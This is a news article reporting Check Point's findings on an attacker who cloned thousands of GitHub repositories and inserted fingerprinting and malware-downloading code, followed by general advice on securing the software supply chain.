Github Supply Chain Attack

Uploaded on 2022-08-04 in TECHNOLOGY--Hackers, FREE TO VIEW, BUSINESS-Services-IT & Telecoms, TECHNOLOGY--Resilience

A significant software supply chain attack has been discovered in Github, and while the attack was prevented from spreading further, the ramifications of “supply chain” attacks are clear and intimidating.

Github is the most popular code repository used by over 83 million developers across the globe. Their repository allows developers to track and control the source code that they store in the repository. Its users represent the largest coding community in the world. 

 

What Is Github?

Github allows developers to collaborate on code repositories, so that other developers can contribute to code which is not their own, while giving the owner of the original code full control to accept or reject changes made by another member of the community.

It is common for developers to download code repositories and use the code in their own applications.

In a situation where a developer wants to significantly change the code of another developer, they use Github’s Clone function. This allows a developer to create an exact copy of someone else’s code – where the original version remains untouched under the management of its original author. It retains its existing interaction stats like views, contributions and followers, while the new cloned version is under new ownership with no interaction stats associated with it because it is essentially new code (albeit copied from something existing).

What Happened?

According to research from Check Point, a malicious actor cloned upwards of 35,000 Github repositories and kept them identical to the original source code, with the addition of malicious code. This malicious code was able to build a fingerprint – to collect details of the environment in which it is executed. The code could collect device identity, the identity of the user and possibly additional sensitive data.

More significantly this code included the ability to download additional malware from a third party site. This additional malware could further exploit any application or environment which was using this code which originated in the weaponized cloned repositories in Github.

The developers’ community identified the malicious implant within code that was downloaded from Github and immediately the community feared that source code from the original repositories had been infected by this malware. However, upon further research it became clear that the infected code was in fact Cloned code which had been downloaded from Github under the assumption that the developer was downloading the original non-malicious repository.

This has potentially catastrophic implications for the software supply chain where an unassuming developer mistakenly downloads a cloned code repository which includes malicious code, uses it for their own purposes and then unknowingly provides their users with code that includes malware.

How To Prevent Supply Chain Attacks

The practice of shifting security “left” and providing security teams with automated tools for DevOps to embed  security into their pipelines is not new, but adoption is slow. This attempt to attack innumerable environments and applications is a clear example of why supply chain security is critical.

CheckPoint recommends software developers use automated security tools to scan source code to ensure that all code is security centric, eliminating threats at the earliest phase.

Check Point

You Might Also Read: 

Improving The Security Of Open Source Software:

 

« Perimeter 81 / Zero Trust Network Access Guide
Cybersecurity Essentials For Cloud Environments »

CyberSecurity Jobsite
Perimeter 81
Cyrin

Real Attacks. Real Tools. Real Scenarios.
Schedule a demo

Go Cyber

Training that transforms behaviours

Sign Up: Cyber Security Intelligence Newsletter

Directory of Suppliers

Jooble

Jooble

Jooble is a job search aggregator operating in 71 countries worldwide. We simplify the job search process by displaying active job ads from major job boards and career sites across the internet.

NordLayer

NordLayer

NordLayer is an adaptive network access security solution for modern businesses — from the world’s most trusted cybersecurity brand, Nord Security. 

The PC Support Group

The PC Support Group

A partnership with The PC Support Group delivers improved productivity, reduced costs and protects your business through exceptional IT, telecoms and cybersecurity services.

Clayden Law

Clayden Law

Clayden Law advise global businesses that buy and sell technology products and services. We are experts in information technology, data privacy and cybersecurity law.

BackupVault

BackupVault

BackupVault is a leading provider of automatic cloud backup and critical data protection against ransomware, insider attacks and hackers for businesses and organisations worldwide.

authen2cate

authen2cate

Authen2cate offers a simple way to provide application access with our Identity and Access Management (IAM) solutions for enterprise, small business, and individual customers alike.

F5 Networks

F5 Networks

F5 products ensure that network applications are always secure and perform the way they should—anywhere, any time, and on any device.

Council on Foreign Relations (CFR)

Council on Foreign Relations (CFR)

CFR is dedicated to better understanding the world and the foreign policy choices facing the USA and other countries. Cyber security is covered within the CFR topic areas.

Alert Logic

Alert Logic

Alert Logic delivers unrivaled security for any environment, delivering industry-leading managed detection and response (MDR) and web application firewall (WAF) solutions.

Rambus Security Division

Rambus Security Division

Rambus Security Division solutions span areas including tamper resistance, content protection, network security, mobile payment, smart ticketing, and trusted provisioning services.

Cyber Future Foundation (CFF)

Cyber Future Foundation (CFF)

CFF was established to create a cyberspace where digital commerce and innovation can thrive based on trust and respect to individual privacy.

Snyk

Snyk

Snyk is the leader in developer security. We empower the world’s developers to build secure applications and equip security teams to meet the demands of the digital world.

Hack The Box

Hack The Box

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field.

Banshie

Banshie

Banshie is an independent cyber security company with a small team of recognized specialist that are among the best in their field.

iSecurity Consulting

iSecurity Consulting

iSecurity delivers a complete lifecycle of digital protection services across the globe for public and private sector clients.

Digitpol

Digitpol

Digitpol’s Cyber Crime Investigation experts investigate hacking incidents, ransomware, extortion and conduct security audits and IT upgrades.

Clear Thinking Solutions

Clear Thinking Solutions

Clear Thinking is an IT Solutions company specialising in secure & compliant technical services.

Rubrik

Rubrik

Rubrik helps enterprises achieve data control to drive business resiliency, cloud mobility, and regulatory compliance.

TatvaSoft

TatvaSoft

TatvaSoft is a custom software development company delivering business IT solutions and related services to customers across the globe.

risk3sixty

risk3sixty

Risk3sixty are information and cyber risk management craftsmen helping build business-first security and compliance programs.

FTx Identity

FTx Identity

FTx Identity is the world's most advanced age verification technology (AVT) and identity management system.